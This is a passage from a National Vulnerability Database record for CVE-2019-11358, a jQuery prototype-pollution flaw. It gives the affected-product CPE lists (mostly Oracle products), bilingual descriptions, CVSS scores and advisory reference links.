"cpe:2.3:a:oracle:hospitality_guest_access:4.2.0:*:*:*:*:*:*:*", matchCriteriaId: "1A3DC116-2844-47A1-BEC2-D0675DD97148", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_guest_access:4.2.1:*:*:*:*:*:*:*", matchCriteriaId: "E0F1DF3E-0F2D-4EFC-9A3E-F72149C8AE94", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_materials_control:18.1:*:*:*:*:*:*:*", matchCriteriaId: "2AC63D10-2326-4542-B345-31D45B9A7408", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_simphony:*:*:*:*:*:*:*:*", matchCriteriaId: "7BFD7783-BE15-421C-A550-7FE15AB53ABF", versionEndIncluding: "19.1.2", versionStartIncluding: "19.1.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_simphony:18.1:*:*:*:*:*:*:*", matchCriteriaId: "1F7BF047-03C5-4A60-B718-E222B16DBF41", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_simphony:18.2:*:*:*:*:*:*:*", matchCriteriaId: "E3A73D81-3E1A-42E6-AB96-835CDD5905F2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:identity_manager:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "AA10CA55-C155-4DAD-A109-87A80116F1A1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_accounting_analyzer:8.0.9:*:*:*:*:*:*:*", matchCriteriaId: "66136D6D-FC52-40DB-B7B6-BA8B7758CE16", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.0.8:*:*:*:*:*:*:*", matchCriteriaId: "06514F46-544B-4404-B45C-C9584EBC3131", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_allocation_manager_for_enterprise_profitability:8.1.0:*:*:*:*:*:*:*", matchCriteriaId: "3BD4BF9A-BF38-460D-974D-5B3255AAF946", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_data_foundation:*:*:*:*:*:*:*:*", matchCriteriaId: "92D538A5-819D-4DF7-85FE-4D4EB6E230E0", versionEndIncluding: "8.0.7", versionStartIncluding: "8.0.4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_ifrs_17_analyzer:8.0.6:*:*:*:*:*:*:*", matchCriteriaId: "AEDA3A88-002B-4700-9277-3187C0A3E4B4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_ifrs_17_analyzer:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "BE886BC5-F807-4627-8233-2290817FE205", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:*:*:*:*:*:*:*:*", matchCriteriaId: "B47C73D0-BE89-4D87-8765-12C507F13AFF", versionEndIncluding: "5.6.0.0", versionStartIncluding: "5.0.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.6.1.0:*:*:*:*:*:*:*", matchCriteriaId: "5B8AA91A-1880-43CD-938D-48EF58ACF2CF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:insurance_performance_insight:8.0.7:*:*:*:*:*:*:*", matchCriteriaId: "E6B5D7DB-C70E-4926-819F-E39B79F4D0C5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:*", matchCriteriaId: "41684398-18A4-4DC6-B8A2-3EBAA0CBF9A6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "A7506589-9B3B-49BA-B826-774BFDCC45B8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "228DA523-4D6D-48C5-BDB0-DB1A60F23F8B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "335AB6A7-3B1F-4FA8-AF08-7D64C16C4B04", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper_and_adf:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "37EB4A1D-A875-46B7-BEB0-694D1F400CF7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper_and_adf:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "2233F287-6B9F-4C8A-A724-959DD3AD29AF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:jdeveloper_and_adf:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "2381FAB6-8D36-4389-98E4-74F3462654BA", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:knowledge:*:*:*:*:*:*:*:*", matchCriteriaId: "9E587602-BA7D-4087-BE29-ACE0B01BD590", versionEndIncluding: "8.6.3", versionStartIncluding: "8.6.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.55:*:*:*:*:*:*:*", matchCriteriaId: "45CB30A1-B2C9-4BF5-B510-1F2F18B60C64", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:*", matchCriteriaId: "D0A735B4-4F3C-416B-8C08-9CB21BAD2889", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:*", matchCriteriaId: "7E1E416B-920B-49A0-9523-382898C2979D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.58:*:*:*:*:*:*:*", matchCriteriaId: "D9DB4A14-2EF5-4B54-95D2-75E6CF9AA0A9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:*:*:*:*:*:*:*:*", matchCriteriaId: "84668F58-6511-4E53-8213-13B440F454C1", versionEndIncluding: "12.2.15", versionStartIncluding: "12.2.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:10.4.7:*:*:*:*:*:*:*", matchCriteriaId: "9D8B3B57-73D6-4402-987F-8AE723D52F94", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:12.1.0:*:*:*:*:*:*:*", matchCriteriaId: "62BF043E-BCB9-433D-BA09-7357853EE127", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation:12.1.1:*:*:*:*:*:*:*", matchCriteriaId: "3F26FB80-F541-4B59-AC3C-633F49388B59", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_connector_for_siebel:10.4.6:*:*:*:*:*:*:*", matchCriteriaId: "0DB5E2C7-9C68-4D3B-95AD-9CBF65DE1E94", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:*:*:*:*:*:*:*:*", matchCriteriaId: "12D3B2F0-E9C7-432B-91C6-A6C329A84B78", versionEndIncluding: "12.2.15", versionStartIncluding: "12.2.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*", matchCriteriaId: "06CF27F6-ADC1-480C-9D2E-2BD1E7330C32", versionEndIncluding: "16.2.11", versionStartIncluding: "16.2.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*", matchCriteriaId: "E4AA3854-C9FD-4287-85A0-EE7907D1E1ED", versionEndIncluding: "17.12.7", versionStartIncluding: "17.12.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*", matchCriteriaId: "E8CD4002-F310-4BE4-AF7B-4BCCB17DA6FF", versionEndIncluding: "18.8.9", versionStartIncluding: "18.8.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:*", matchCriteriaId: "69112C56-7747-4E11-A938-85A481529F58", versionEndIncluding: "19.12.4", versionStartIncluding: "19.12.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_gateway:15.2.18:*:*:*:*:*:*:*", matchCriteriaId: "D9E628E7-6CC5-418C-939F-8EEA69B222A0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*", matchCriteriaId: "08FA59A8-6A62-4B33-8952-D6E658F8DAC9", versionEndIncluding: "17.12", versionStartIncluding: "17.7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*", matchCriteriaId: "D55A54FD-7DD1-49CD-BE81-0BE73990943C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*", matchCriteriaId: "82EB08C0-2D46-4635-88DF-E54F6452D3A3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*", matchCriteriaId: "202AD518-2E9B-4062-B063-9858AE1F9CE2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:real-time_scheduler:*:*:*:*:*:*:*:*", matchCriteriaId: "99579D88-27C0-4B93-B2F4-69B6781BC4BD", versionEndIncluding: "2.3.0.3", versionStartIncluding: "2.3.0.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:rest_data_services:11.2.0.4:*:*:*:-:*:*:*", matchCriteriaId: "36FC547E-861A-418C-A314-DA09A457B13A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:rest_data_services:12.1.0.2:*:*:*:-:*:*:*", matchCriteriaId: "DF9FEE51-50E3-41E9-AA0D-272A640F85CC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:rest_data_services:12.2.0.1:*:*:*:-:*:*:*", matchCriteriaId: "E69E905F-2E1A-4462-9082-FF7B10474496", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:rest_data_services:18c:*:*:*:-:*:*:*", matchCriteriaId: "0F9B692C-8986-4F91-9EF4-2BB1E3B5C133", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:rest_data_services:19c:*:*:*:-:*:*:*", matchCriteriaId: "C5F4C40E-3ABC-4C59-B226-224262DCFF37", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_back_office:14.0:*:*:*:*:*:*:*", matchCriteriaId: "31C7EEA3-AA72-48DA-A112-2923DBB37773", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_back_office:14.1:*:*:*:*:*:*:*", matchCriteriaId: "F0735989-13BD-40B3-B954-AC0529C5B53D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_central_office:14.0:*:*:*:*:*:*:*", matchCriteriaId: "83B5F416-56AE-4DC5-BCFF-49702463E716", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_central_office:14.1:*:*:*:*:*:*:*", matchCriteriaId: "58405263-E84C-4071-BB23-165D49034A00", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_customer_insights:15.0:*:*:*:*:*:*:*", matchCriteriaId: "AD4AB77A-E829-4603-AF6A-97B9CD0D687F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_customer_insights:16.0:*:*:*:*:*:*:*", matchCriteriaId: "6DE15D64-6F49-4F43-8079-0C7827384C86", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:18.0:*:*:*:*:*:*:*", matchCriteriaId: "36E16AEF-ACEB-413C-888C-8D250F65C180", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_customer_management_and_segmentation_foundation:19.0:*:*:*:*:*:*:*", matchCriteriaId: "9EFAEA84-E376-40A2-8C9F-3E0676FEC527", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_point-of-service:14.0:*:*:*:*:*:*:*", matchCriteriaId: "237968A4-AE89-44DC-8BA3-D9651F88883D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_point-of-service:14.1:*:*:*:*:*:*:*", matchCriteriaId: "E13DF2AE-F315-4085-9172-6C8B21AF1C9E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_returns_management:14.0:*:*:*:*:*:*:*", matchCriteriaId: "959316A8-C3AF-4126-A242-3835ED0AD1E8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:retail_returns_management:14.1:*:*:*:*:*:*:*", matchCriteriaId: "BDB925C6-2CBC-4D88-B9EA-F246F4F7A206", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:service_bus:11.1.1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "1E2B6C75-3EB5-4BCE-B5D1-39DD3DE94139", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:service_bus:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "70BEF219-45EC-4A53-A815-42FBE20FC300", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:service_bus:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "1EA2023A-1AD6-41FE-A214-9D1F6021D6B6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:siebel_mobile_applications:*:*:*:*:*:*:*:*", matchCriteriaId: "2AA4E307-D5FA-461D-9809-BDD123AE7B74", versionEndIncluding: "19.8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:siebel_ui_framework:20.8:*:*:*:*:*:*:*", matchCriteriaId: "98B9198C-11DF-4E80-ACFC-DC719CED8C7E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:storagetek_tape_analytics_sw_tool:2.3.0:*:*:*:*:*:*:*", matchCriteriaId: "587EE4F3-E7AC-4A69-9476-0E71E75EE7A4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:system_utilities:19.1:*:*:*:*:*:*:*", matchCriteriaId: "A7961BBD-6411-4D32-947D-3940221C235B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:tape_library_acsls:8.5:*:*:*:*:*:*:*", matchCriteriaId: "162C6FD9-AEC2-4EBA-A163-3054840B8ACE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:tape_library_acsls:8.5.1:*:*:*:*:*:*:*", matchCriteriaId: "A6879D52-A44E-4DF8-8A3A-3613822EB469", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:transportation_management:1.4.3:*:*:*:*:*:*:*", matchCriteriaId: "5AAF89C1-AAC2-449C-90C1-895F5F8843B4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:utilities_mobile_workforce_management:*:*:*:*:*:*:*:*", matchCriteriaId: "2F2D3FA0-BD9D-4828-AE36-1CE43D9B07D1", versionEndIncluding: "2.3.0.3", versionStartIncluding: "2.3.0.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "D551CAB1-4312-44AA-BDA8-A030817E153A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", matchCriteriaId: "B40B13B7-68B3-4510-968C-6A730EB46462", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*", matchCriteriaId: "C93CC705-1F8C-4870-99E6-14BF264C3811", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "F14A818F-AA16-4438-A3E4-E64C9287AC66", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*", matchCriteriaId: "04BCDC24-4A21-473C-8733-0D9CFB38A752", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:joomla:joomla\\!:*:*:*:*:*:*:*:*", matchCriteriaId: "C63557DE-E65B-46F4-99C4-247EACCB7BBA", versionEndIncluding: "3.9.4", versionStartIncluding: "3.0.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:juniper:junos:21.2:-:*:*:*:*:*:*", matchCriteriaId: "216E7DDE-453D-481F-92E2-9F8466CDDA3F", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__ property, it could extend the native Object.prototype.", }, { lang: "es", value: "jQuery, en versiones anteriores a 3.4.0, como es usado en Drupal, Backdrop CMS, y otros productos, maneja mal jQuery.extend(true, {}, ...) debido a la contaminación de Object.prototype. Si un objeto fuente no sanitizado contenía una propiedad enumerable __proto__, podría extender el Object.prototype nativo.", }, ], id: "CVE-2019-11358", lastModified: "2024-11-21T04:20:56.320", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "MEDIUM", cvssData: { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "NONE", baseScore: 4.3, confidentialityImpact: "NONE", integrityImpact: "PARTIAL", vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N", version: "2.0", }, exploitabilityScore: 8.6, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: true, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, exploitabilityScore: 2.8, impactScore: 2.7, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2019-04-20T00:29:00.247", references: [ { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00006.html", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00025.html", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", "VDB Entry", ], url: "http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "http://seclists.org/fulldisclosure/2019/May/10", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Patch", "Third Party Advisory", ], url: "http://seclists.org/fulldisclosure/2019/May/11", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Patch", "Third Party Advisory", ], url: "http://seclists.org/fulldisclosure/2019/May/13", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Patch", "Third Party Advisory", ], url: "http://www.openwall.com/lists/oss-security/2019/06/03/2", }, { source: "cve@mitre.org", tags: [ "Broken Link", "Third Party Advisory", "VDB Entry", ], url: "http://www.securityfocus.com/bid/108023", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHBA-2019:1570", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:1456", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:2587", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3023", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://access.redhat.com/errata/RHSA-2019:3024", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://backdropcms.org/security/backdrop-sa-core-2019-009", }, { source: "cve@mitre.org", tags: [ "Release Notes", "Vendor Advisory", ], url: "https://blog.jquery.com/2019/04/10/jquery-3-4-0-released/", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/commit/753d591aea698e57d6db58c9f722cd0808619b1b", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/jquery/jquery/pull/4333", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/08720ef215ee7ab3386c05a1a90a7d1c852bf0706f176a7816bf65fc%40%3Ccommits.airflow.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/5928aa293e39d248266472210c50f176cac1535220f2486e6a7fa844%40%3Ccommits.airflow.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/6097cdbd6f0a337bedd9bb5cc441b2d525ff002a96531de367e4259f%40%3Ccommits.airflow.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/88fb0362fd40e5b605ea8149f63241537b8b6fb5bfa315391fc5cbb7%40%3Ccommits.airflow.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/b736d0784cf02f5a30fbb4c5902762a15ad6d47e17e2c5a17b7d6205%40%3Ccommits.airflow.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6%40%3Ccommits.roller.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3%40%3Ccommits.nifi.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/r2041a75d3fc09dec55adfd95d598b38d22715303f65c997c054844c9%40%3Cissues.flink.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/r2baacab6e0acb5a2092eb46ae04fd6c3e8277b4fd79b1ffb7f3254fa%40%3Cissues.flink.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/r38f0d1aa3c923c22977fe7376508f030f22e22c1379fbb155bf29766%40%3Cdev.syncope.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/r41b5bfe009c845f67d4f68948cc9419ac2d62e287804aafd72892b08%40%3Cissues.flink.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/r7aac081cbddb6baa24b75e74abf0929bf309b176755a53e3ed810355%40%3Cdev.flink.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/r7d64895cc4dff84d0becfc572b20c0e4bf9bfa7b10c6f5f73e783734%40%3Cdev.storm.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/r7e8ebccb7c022e41295f6fdb7b971209b83702339f872ddd8cf8bf73%40%3Cissues.flink.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/rac25da84ecdcd36f6de5ad0d255f4e967209bbbebddb285e231da37d%40%3Cissues.flink.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", ], url: "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b%40%3Ccommits.nifi.apache.org%3E", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2019/05/msg00006.html", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2019/05/msg00029.html", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2020/02/msg00024.html", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/4UOAZIFCSZ3ENEFOR5IXX6NFAD3HV7FA/", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5IABSKTYZ5JUGL735UKGXL5YPRYOPUYI/", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KYH3OAGR2RTCHRA5NOKX2TES7SNQMWGO/", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QV3PKZC3PQCO3273HAT76PAQZFBEO4KP/", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RLXRX23725JL366CNZGJZ7AQQB7LHQ6F/", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WZW27UCJ5CYFL4KFFFMYMIBNMIU2ALG5/", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://seclists.org/bugtraq/2019/Apr/32", }, { source: "cve@mitre.org", tags: [ "Issue Tracking", "Mailing List", "Third Party Advisory", ], url: "https://seclists.org/bugtraq/2019/Jun/12", }, { source: "cve@mitre.org", tags: [ "Mailing List", "Patch", "Third Party Advisory", ], url: "https://seclists.org/bugtraq/2019/May/18", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20190919-0001/", }, { source: "cve@mitre.org", tags: [ "Exploit", "Third Party Advisory", ], url: "https://snyk.io/vuln/SNYK-JS-JQUERY-174006", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://supportportal.juniper.net/s/article/2021-07-Security-Bulletin-Junos-OS-Multiple-J-Web-vulnerabilities-resolved-in-Junos-OS-21-2R1", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://www.debian.org/security/2019/dsa-4434", }, { source: "cve@mitre.org", tags: [ "Third Party Advisory", ], url: "https://www.debian.org/security/2019/dsa-4460", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.drupal.org/sa-core-2019-006", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { source: "cve@mitre.org", tags: [ "Patch", "Third Party Advisory", 